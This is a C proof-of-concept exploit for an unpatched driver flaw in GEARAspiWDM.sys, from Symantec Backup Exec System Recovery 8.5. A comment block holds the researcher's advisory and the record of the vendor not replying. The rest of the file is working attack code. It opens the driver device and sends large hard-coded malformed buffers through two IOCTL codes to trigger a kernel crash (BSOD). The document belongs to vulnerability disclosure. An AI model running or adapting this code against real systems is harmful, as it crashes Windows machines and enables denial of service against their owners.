|
#include <stdio.h> #include <windows.h> #include <winioctl.h> #include <stdlib.h> #include <string.h>
/* Program : Symantec Backup Exec System Recovery 8.5 - 0day Homepage : http://www.symantec.com Discovery : 2009/12/23 Author Contacted : 2011/04/01 - No reply Author Contacted : 2011/04/29 - No reply... again ! Patch Updated : Not now Found by : Heurs This Advisory : Heurs Contact : s.leberre@sysdream.com
//----- Application description
Symantec Backup Exec System Recovery 8.5 is a complete disk-based system recovery solution for Microsoft Windows based servers, desktops, and laptops that allow businesses to recover from system loss or disasters in minutes, not hours or days - even when recovering to a dissimilar hardware platform; to a virtual environment; or to a remote, unattended location. In short, this powerful solution gives an administrator unprecedented power in meeting ambitious recovery time objectives and service-level agreements.
//----- Description of vulnerability
GEARAspiWDM.sys (the CD / DVD filter) driver don't check all inputs of an IOCTL. An exception can be thrown if we modify one byte. With my test I can't do best exploitation than a BSOD.
//----- Credits
http://www.sysdream.com http://www.hackinparis.com/ http://ghostsinthestack.org
s.leberre at sysdream dot com heurs at ghostsinthestack dot org
*/
int __cdecl main(int argc, char* argv[]) { HANDLE hDevice = (HANDLE) 0xffffffff; DWORD NombreByte; DWORD Crashing2[] = { 0x98521a4e, 0x35c9b325, 0x329aded9, 0x2b89a43f, 0x9e338a58, 0x54372b5f, 0x1c6164bb, 0x439b3b32, 0x7ffa3ca5, 0x90ee3512, 0xb3be1b06, 0x9363dad1, 0x1f91adea, 0xcc611f7e, 0xdf527cc9, 0xb0856250, 0x4a0d92ff, 0x7b57a9fd, 0xe438ef46, 0x013ac977, 0xb6ce60fc, 0x6042a1f8, 0xe4da87f0, 0x118e4887, 0x47ea6b36, 0xfb83daa8, 0xd50ff81b, 0xfd3c97c9, 0xd743656a, 0x8b7318b7, 0x955d2607, 0x0cb6d64f, 0x3acc85fb, 0xca8f44d3, 0x2859a3de, 0x80fdabb1, 0x63b5fc1d, 0x9b2b73d7, 0x16038535, 0xb8072dca, 0xda4edb5a, 0xe7e89f58, 0xd2b0d395, 0x64b404a4, 0x422f6292, 0xafb88db2, 0xefee2383, 0x2034e944, 0x9c7f782e, 0x40d0b37e, 0x95c621e1, 0xc67d9c45, 0xf4bfc4d8, 0xa6b50be6, 0xaf327fcf, 0x8ea76c13, 0x85bf39d2, 0x3224f445, 0xf13ffd4d, 0x8a0ed02e, 0x11768b7f, 0x05da276b, 0xc264c7de, 0x70038327, 0x9f965ab9, 0x7bd47648, 0xfbe34062, 0x94e5540f, 0xe41cc6c2, 0x5b4a2559, 0x429e5122, 0x83c913e4, 0xca98e661, 0xbd3ad1fe, 0x972a24c2, 0xb77b0b77, 0x48e31285, 0x77dd9743, 0x42374f25, 0xdf841c34, 0x5aa3d162, 0x4f8cf953, 0xbc2ada9d, 0xa4cad244, 0x9080a47f, 0x27af163a, 0xf8e5b0e1, 0x80248421, 0x963b4b99, 0x2ca00d49, 0x81b3ef37, 0xc2466b09, 0x46ccb43a, 0xff10f2f9, 0xac712349, 0x5ad59d96, 0xd978b259, 0xcbcfeca1, 0x98273614, 0x332f6c59, 0xa486d4ee, 0x7fad0d57, 0xf65601c1, 0xeb1e6321, 0x50408419, 0x5190a0e8, 0xb3cc3374, 0xeabd4a3d, 0xd236b852, 0x92cba4db, 0x4e52f33a, 0xa9f488cb, 0x067d88e4, 0xd31d588d, 0x47aa2c28, 0xf0918cb3, 0x46c518af, 0x430a2c52, 0xc49fc7ca, 0x49e7d5f0, 0x6cd26dbc, 0xd83fde69, 0x926c03ba, 0xb4850695, 0x9235d279, 0xaa1ffa33, 0x996f4d09, 0xbfed8fa0, 0x30cff2cc, 0x1f21d5c3, 0x38c3f62b, 0x8291db1e, 0xb536c7e0, 0x3c705ff0, 0x23f180a2, 0xdbb6059e, 0x4dd9351a, 0x231487bc, 0x915fe713, 0x87616e77, 0xdbcb473e, 0x1a830215, 0x8cbba20a, 0x902a03d8, 0xfcf9b1eb, 0xca69f2be, 0x44a96ca3, 0xa7d7aaab, 0x8949408f, 0xc9d0d1e2, 0x2775a41c, 0x71f381ff, 0xba970686, 0x222a18f5, 0xfab74884, 0xb53efcb4, 0xfbb46a7a, 0x1de45c9f, 0xbb5838ad, 0x274cfd1b, 0xa841ffcb, 0x02f17a83, 0x18fe4da2, 0xa4a1b953, 0x788a1f92, 0x8a0c5b81, 0x54b69f16, 0x570abe6b, 0x7e58db8e, 0x1d6d7245, 0x0f6f7b5e, 0x7121c421, 0xefa6a254, 0xb1fd7db2, 0xc9bc5216, 0x2ae57c8d, 0xa9ccba01, 0x1e375901, 0x0fe3e83b, 0x729f90db, 0x4e054937, 0x9861523c, 0x644cc902, 0xf23b2474, 0x599a913f, 0x32ccfcd9, 0x7f3ca050, 0x3de365f6, 0x55ca0856, 0x72113509, 0x188f3b56, 0x4fa1b960, 0x403d751a, 0xfeb043d7, 0x5b451a9d, 0x52cdfdf4, 0x7c84854c, 0xaea8abc2, 0x1f690135, 0x0d98ac73, 0x90d3fb36, 0x92c4c71c, 0xa329ece4, 0xffe6a577, 0x70a4829e, 0x9fd6b0b7, 0x13ec771e, 0xa8724de2, 0xa8d25ffb, 0x84b00cce, 0xa1791d95, 0xe6a5cb04, 0xd0460421, 0x0fa785ea, 0x0521dfea, 0x6b745113, 0xc3512018, 0x3613d26c, 0x5fcebf1f, 0x6dd6a8ed, 0xf29a61ce, 0x66e0c099, 0x2bff4910, 0x6e92dbdd, 0xafce203a, 0xed07a42b, 0x657cd627, 0xcc05e18f, 0x848aa8cd, 0x5db76bf0, 0x66feef0f, 0x36fefa72, 0xac75a2fa, 0x8cd0ec62, 0x2805f29c, 0x3f9af683, 0xedc84ed5, 0xcafa4942, 0x29f94618, 0x80d6f110, 0x924035d0, 0x239cfd83, 0x4251cea1, 0xf54575db, 0x3c9815b4, 0xcb86e9df, 0xe0a46e7b, 0x8feb5e66, 0x17dee85f, 0xcf9d26f4, 0x6afe496e, 0x3e8c1322, 0xe6f99038, 0xd4735c42, 0x760d0bd6, 0xb43c3c60, 0x788de1ce, 0xf52c1d56, 0xa6d31938, 0x275cb624, 0x9ae96c95, 0x194068c6, 0xe5eee0a2, 0x2ee7d840, 0xdd82ba28, 0x3435826a, 0x9a486fc3, 0x2701aa59, 0x6c362b8f, 0x4e5d96a6, 0x1bdc57f7, 0x754c2319, 0x71380617, 0x90542310, 0x65d72160, 0x3f77356e, 0x41e648e9, 0x250870ae, 0x29f398a2, 0x1b980674, 0x8d41476f, 0x9b9ec36a, 0x017d514a, 0x75badffc, 0x0ca9dccf, 0xb1fb1936, 0x6ca3bdd7, 0xc5fd39b8, 0x8d6878ba, 0x1769e6dc, 0xac396388, 0xaaa92090, 0xea758f25, 0x250ece7a, 0x84a575fb, 0x08f09242, 0xe983aa84, 0x06a02443, 0x047accd5, 0x86814c54, 0xae978f01, 0x2a8df4b7, 0x5079e1f7, 0x4599b151, 0x4b06b065, 0x0fa58f90, 0x11e0624c, 0xc3a3f881, 0xf795fe91, 0x9e9542c6, 0x37262888, 0x21dfb940, 0x695be284, 0x28d116e1, 0x7f81a807, 0x308a5e2b, 0x0312f4a5, 0xe77753d6, 0xa834b6dc, 0xc6f0f403, 0xa6a2b904, 0xeb26b1a4, 0x69849a3d, 0x8313560d, 0xe23d7a4b, 0xe96b1262, 0xe94255fb, 0x3901b1e9, 0x351d887b, 0x9e594997, 0xfe8f414c, 0x96f07011, 0xe68fc42c, 0xb38e30a2, 0x1994ef3a, 0x3efbfce9, 0x8b8f3a7f, 0xca93784e, 0x5f3181d7, 0xc84f06eb, 0x8ded82a7, 0x41300e14, 0xb478751b, 0xeeae732c, 0x392889a8, 0xb79591f1, 0xca8bb59d, 0x33d5ac3f, 0xcab7ffb1, 0x1c023d41, 0xf4d85961, 0xec42794f, 0xd3e126b0, 0x572fe83b, 0x7b3ea605, 0x4bfa2f3b, 0x595b381d, 0x0f1f55dd, 0xf07401fd, 0x322c17b4, 0x7ac23729, 0x9e747fa4, 0x648391dc, 0x684f5e6f, 0x6f672b78, 0xe57a7f45, 0x5fea1b7a, 0x562401c8, 0xa640bafe, 0x22a1ea24, 0x90a358c5, 0x2fa7712f, 0x75505628, 0xab0d1b9b, 0x7f40ccba, 0x74034eaf, 0xc7be1659, 0x35a10242, 0xcd61afed, 0x6a4f3f61, 0x6793d2e8, 0xb447eded, 0x81b09579, 0x8c57ec03, 0x7f89ca0d, 0xb75faf20, 0x6977fa05, 0x9d272f79, 0xaa90665a, 0x91fcc55b, 0xfa06b20e, 0xfcb48f7a, 0xce1760ed, 0x58dc9e13, 0x99152bc4, 0x9021e937, 0xfbc15bc5, 0xc49ab6cf, 0xfe322467, 0x1cda3004, 0x01badd03, 0x28308712, 0x05708f56, 0x612f4410, 0x3345bdfd, 0x0b3a8804, 0x36b0b314, 0xaf8b63a5, 0x90ca55ab, 0x1f946e9e, 0xecb27651, 0x7e5c8406, 0xd3f8fc3b, 0x1e30cf60, 0x3ac797fa, 0x48d3a898, 0xf4a6080d, 0x680e7e2e, 0x745388ff, 0x8027ded5, 0x461989ac, 0x5426a0a9, 0xa1ecc4a8, 0x3862c461, 0xda87b1ce, 0x9dbc1647, 0x225898f0, 0xf72d47fe, 0x0af3377d, 0xc5c569e7, 0xb8d8fb7a, 0x0c46c695, 0x508d9e3f, 0xc4a96a93, 0xef7450d3, 0x14860105, 0x9e5518bc, 0x56a024ee, 0xc1d14889, 0x9e9029ae, 0x06700d49, 0x5b4655a3, 0xe7c7e1be, 0x596c98b5, 0xf91d9006, 0x5daf3db2, 0xdbd3dea9, 0x2f1471d9, 0x5d26bd87, 0x7758e268, 0x6d6f3ab4, 0x45c55824, 0x60e4cf0e, 0x54c2b90d, 0x0317c728, 0xca7681b6, 0xb2813304, 0x14fb642e, 0x6297a465, 0x51f7b685, 0x24192969, 0x44b44d6f, 0x66cfe7ae, 0x8ff6a5a9, 0x772a7a50, 0x11d0163e, 0x598113c9, 0x3a03fef9, 0xff9c1a9b, 0xdbd7c110, 0x09b9282e, 0xb19a1723, 0x61d551ad, 0x4edd912c, 0x73cbe308, 0x2d507924, 0x8b6adc6a, 0x7249e4c5, 0xd46b6c78, 0x1a79ed3d, 0x35fc9732, 0x4f3c7746, 0x34537beb, 0xc7a4e647, 0xe524af91, 0x208894fa, 0xae2dc193, 0x7db25b89, 0x8cd21de4, 0x5cdaa83a, 0xf973bed3, 0x6ca77231, 0x6b6d299a, 0xa017dcfd, 0x53ea60d1, 0xe31720ba, 0xf406d12f, 0x8167076d, 0xb62a7ba8, 0x83a54a0d, 0x838c6ffc, 0xcd7b5253, 0x4b49b33b, 0x8ece311d, 0x5001914b, 0x1fcc872f, 0x36192027, 0x26889789, 0xb26a39d4, 0x69ce1d9e, 0x41d01758, 0x9ea92324, 0xd56131f3 }; DWORD Crashing1[] = { 0x34e4fa15, 0xd60f859b, 0x45470f01, 0x73415241, 0x66206970, 0x4e20726f, 0x45470054, 0x6f505241, 0x50207472, 0x6e00506e, 0xacea16d8, 0xef58b300, 0x36609f08, 0xf826b866, 0x06257426 }; BYTE Out[0x04]; BYTE Response[32]; printf("Kernel Pointers Dereferences - Symantec Backup Exec System Recovery 8.5 (0day)\n\n"); hDevice = CreateFile("\\\\.\\GEARAspiWDMDevice",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL); //printf("%x\n",hDevice); printf("Crashs possibles : \n1 : DeviceIoControl 0x00222008\n2 : DeviceIoControl 0x00222010"); printf("\nSelect the crash : "); scanf("%c", &Response); if (Response[0] == 0x32) { if (DeviceIoControl(hDevice,0x00222010,Crashing2,sizeof(Crashing2),Crashing2,sizeof(Crashing2),&NombreByte,NULL) == 0) { printf("Error : DeviceIoControl : %d\n", GetLastError()); } } if (Response[0] == 0x31) { if (DeviceIoControl(hDevice,0x00222008,Crashing1,sizeof(Crashing1),Crashing1,sizeof(Crashing1),&NombreByte,NULL) == 0) { printf("Error : DeviceIoControl : %d\n", GetLastError()); } } printf("Finished.\n\n"); CloseHandle(hDevice); getch(); return 0; }
|